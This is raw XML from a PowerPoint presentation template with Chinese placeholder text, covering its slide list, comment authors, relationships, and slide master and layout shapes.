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320" r:id="rId3"/>
    <p:sldId id="475" r:id="rId4"/>
    <p:sldId id="637" r:id="rId6"/>
    <p:sldId id="639" r:id="rId7"/>
    <p:sldId id="641" r:id="rId8"/>
    <p:sldId id="642" r:id="rId9"/>
    <p:sldId id="655" r:id="rId10"/>
    <p:sldId id="656" r:id="rId11"/>
    <p:sldId id="659" r:id="rId12"/>
    <p:sldId id="660" r:id="rId13"/>
    <p:sldId id="661" r:id="rId14"/>
    <p:sldId id="657" r:id="rId15"/>
    <p:sldId id="658" r:id="rId16"/>
    <p:sldId id="662" r:id="rId17"/>
    <p:sldId id="663" r:id="rId18"/>
    <p:sldId id="664" r:id="rId19"/>
    <p:sldId id="665" r:id="rId20"/>
    <p:sldId id="666" r:id="rId21"/>
    <p:sldId id="667" r:id="rId22"/>
    <p:sldId id="690" r:id="rId23"/>
    <p:sldId id="668" r:id="rId24"/>
    <p:sldId id="670" r:id="rId25"/>
    <p:sldId id="669" r:id="rId26"/>
    <p:sldId id="710" r:id="rId27"/>
    <p:sldId id="711" r:id="rId28"/>
    <p:sldId id="712" r:id="rId29"/>
    <p:sldId id="713" r:id="rId30"/>
    <p:sldId id="714" r:id="rId31"/>
    <p:sldId id="715" r:id="rId32"/>
    <p:sldId id="716" r:id="rId33"/>
    <p:sldId id="671" r:id="rId34"/>
    <p:sldId id="703" r:id="rId35"/>
    <p:sldId id="704" r:id="rId36"/>
    <p:sldId id="705" r:id="rId37"/>
    <p:sldId id="706" r:id="rId38"/>
    <p:sldId id="707" r:id="rId39"/>
    <p:sldId id="708" r:id="rId40"/>
    <p:sldId id="746" r:id="rId41"/>
    <p:sldId id="644" r:id="rId42"/>
    <p:sldId id="747" r:id="rId43"/>
    <p:sldId id="780" r:id="rId44"/>
    <p:sldId id="781" r:id="rId45"/>
    <p:sldId id="782" r:id="rId46"/>
    <p:sldId id="645" r:id="rId47"/>
    <p:sldId id="793" r:id="rId48"/>
    <p:sldId id="794" r:id="rId49"/>
    <p:sldId id="795" r:id="rId50"/>
    <p:sldId id="797" r:id="rId51"/>
    <p:sldId id="646" r:id="rId52"/>
    <p:sldId id="771" r:id="rId53"/>
    <p:sldId id="647" r:id="rId54"/>
    <p:sldId id="693" r:id="rId55"/>
    <p:sldId id="768" r:id="rId56"/>
    <p:sldId id="770" r:id="rId57"/>
    <p:sldId id="694" r:id="rId58"/>
    <p:sldId id="769" r:id="rId59"/>
    <p:sldId id="318" r:id="rId60"/>
  </p:sldIdLst>
  <p:sldSz cx="12192000" cy="6858000"/>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1" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="38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熊仪_aYju7RJj" initials="熊" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="1" name="哒哒 熊猫" initials="哒哒" lastIdx="1" clrIdx="0"/>
  <p:cmAuthor id="8" name="yifei" initials="y" lastIdx="1" clrIdx="7"/>
  <p:cmAuthor id="2" name="kingsoft" initials="k" lastIdx="1" clrIdx="1"/>
  <p:cmAuthor id="9" name="ADMIN" initials="A" lastIdx="1" clrIdx="8"/>
  <p:cmAuthor id="3" name="zhouzean" initials="z" lastIdx="1" clrIdx="2"/>
  <p:cmAuthor id="4" name="李鹏飞_6bQfzI3a" initials="李" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="5" name="李晓菲_MZFnUzi6" initials="李" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="6" name="小珞_QjMfU7FR" initials="小" lastIdx="0" clrIdx="0"/>
  <p:cmAuthor id="2001" name="骆倩怡_Znauj26B" initials="authorId_382814100"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21"/>
        <p:guide pos="383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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="tags/tag20.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/commentAuthors" Target="commentAuthors.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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><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PA_任意多边形 5"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1381374"/>
            <a:ext cx="8105565" cy="4091077"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1346 w 2540"/>
              <a:gd name="T1" fmla="*/ 1282 h 1282"/>
              <a:gd name="T2" fmla="*/ 0 w 2540"/>
              <a:gd name="T3" fmla="*/ 1282 h 1282"/>
              <a:gd name="T4" fmla="*/ 0 w 2540"/>
              <a:gd name="T5" fmla="*/ 0 h 1282"/>
              <a:gd name="T6" fmla="*/ 2540 w 2540"/>
              <a:gd name="T7" fmla="*/ 0 h 1282"/>
              <a:gd name="T8" fmla="*/ 1346 w 2540"/>
              <a:gd name="T9" fmla="*/ 1282 h 1282"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2540" h="1282">
                <a:moveTo>
                  <a:pt x="1346" y="1282"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1282"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2540" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346" y="1282"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill dpi="0" rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect/>
            <a:stretch>
              <a:fillRect t="-25000" b="-10000"/>
            </a:stretch>
          </a:bli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1" name="PA_任意多边形 9"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>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任意多边形 13"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1373119"/>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任意多边形 17"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>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矩形 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>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PA_矩形 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="816538"/>
            <a:ext cx="4531458"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矩形 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>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22"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="5718171"/>
            <a:ext cx="4110224" cy="756308"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 1060 w 1288"/>
              <a:gd name="T1" fmla="*/ 237 h 237"/>
              <a:gd name="T2" fmla="*/ 0 w 1288"/>
              <a:gd name="T3" fmla="*/ 237 h 237"/>
              <a:gd name="T4" fmla="*/ 0 w 1288"/>
              <a:gd name="T5" fmla="*/ 0 h 237"/>
              <a:gd name="T6" fmla="*/ 1288 w 1288"/>
              <a:gd name="T7" fmla="*/ 0 h 237"/>
              <a:gd name="T8" fmla="*/ 1060 w 1288"/>
              <a:gd name="T9" fmla="*/ 237 h 237"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1288" h="237">
                <a:moveTo>
                  <a:pt x="1060" y="237"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1288" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060" y="237"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="PA_直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6109853" y="45880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PA_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9852872" y="480485"/>
            <a:ext cx="1808480" cy="58356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传承高铁</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PA_文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8146701" y="4650680"/>
            <a:ext cx="3262432" cy="400110"/>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PA_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697597" y="5804871"/>
            <a:ext cx="1808480" cy="5835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38" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="267335" y="211455"/>
            <a:ext cx="1409700" cy="479425"/>
            <a:chOff x="633" y="230"/>
            <a:chExt cx="1226" cy="417"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39"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10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr userDrawn="1"/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId15"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8231746" y="2042809"/>
            <a:ext cx="652329" cy="652329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="标题 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6534785" y="3102610"/>
            <a:ext cx="4888230" cy="577215"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:def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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>标题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="文本占位符 32"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786370" y="3943985"/>
            <a:ext cx="3622675" cy="377825"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="90170" tIns="46990" rIns="90170" bIns="46990" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单击此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小标题</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="文本占位符 33"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="11" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7970520" y="5026660"/>
            <a:ext cx="3423920" cy="448310"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单击</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此处编辑</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>时间</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="灯片编号占位符 34"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{081D4568-8B36-48D6-98CF-39DF4C18A753}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PA_文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1">
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9008555" y="1968679"/>
            <a:ext cx="2441694" cy="769441"/>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天机系列</a:t>
            </a:r>
            <a:endPar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8" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst>
                <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                  <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                    <a14:imgLayer r:embed="rId3">
                      <a14:imgEffect>
                        <a14:artisticBlur/>
                      </a14:imgEffect>
                    </a14:imgLayer>
                  </a14:imgProps>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:stretch>
              <a:fillRect t="-6000" b="-5000"/>
            </a:stretch>
          </a:bli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Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="1655892"/>
            <a:ext cx="12191999" cy="3546216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0162A7">
              <a:alpha val="35000"/>
            </a:srgb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 name="Freeform 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3752255" y="0"/>
            <a:ext cx="6847965" cy="6858000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 4180"/>
              <a:gd name="T1" fmla="*/ 0 h 4740"/>
              <a:gd name="T2" fmla="*/ 1674 w 4180"/>
              <a:gd name="T3" fmla="*/ 2337 h 4740"/>
              <a:gd name="T4" fmla="*/ 0 w 4180"/>
              <a:gd name="T5" fmla="*/ 4740 h 4740"/>
              <a:gd name="T6" fmla="*/ 2459 w 4180"/>
              <a:gd name="T7" fmla="*/ 4740 h 4740"/>
              <a:gd name="T8" fmla="*/ 4180 w 4180"/>
              <a:gd name="T9" fmla="*/ 2337 h 4740"/>
              <a:gd name="T10" fmla="*/ 2459 w 4180"/>
              <a:gd name="T11" fmla="*/ 0 h 4740"/>
              <a:gd name="T12" fmla="*/ 0 w 4180"/>
              <a:gd name="T13" fmla="*/ 0 h 4740"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T10" y="T11"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T12" y="T13"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4180" h="4740">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1674" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="4740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4180" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2459" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>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Freeform 7"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8182135" y="0"/>
            <a:ext cx="3625490" cy="3381255"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2213 w 2213"/>
              <a:gd name="T1" fmla="*/ 2337 h 2337"/>
              <a:gd name="T2" fmla="*/ 1722 w 2213"/>
              <a:gd name="T3" fmla="*/ 2337 h 2337"/>
              <a:gd name="T4" fmla="*/ 0 w 2213"/>
              <a:gd name="T5" fmla="*/ 0 h 2337"/>
              <a:gd name="T6" fmla="*/ 492 w 2213"/>
              <a:gd name="T7" fmla="*/ 0 h 2337"/>
              <a:gd name="T8" fmla="*/ 2213 w 2213"/>
              <a:gd name="T9" fmla="*/ 2337 h 2337"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2213" h="2337">
                <a:moveTo>
                  <a:pt x="2213" y="2337"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1722" y="2337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213" y="2337"/>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灯片编号占位符 15"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{565CE74E-AB26-4998-AD42-012C4C1AD076}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本占位符 18"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5416550" y="3176905"/>
            <a:ext cx="727710" cy="3594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lvl1pPr marL="0" marR="0" lvl="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" lvl="1" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" lvl="2" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" lvl="3" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" lvl="4" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="756920" y="2937510"/>
            <a:ext cx="3886200" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="90170" tIns="46990" rIns="90170" bIns="46990" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:def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defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>单击此处编辑</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="221615"/>
            <a:ext cx="8169910" cy="886460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="016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99650" y="392836"/>
            <a:ext cx="10515600" cy="576984"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2800" b="1">
                <a:solidFill>
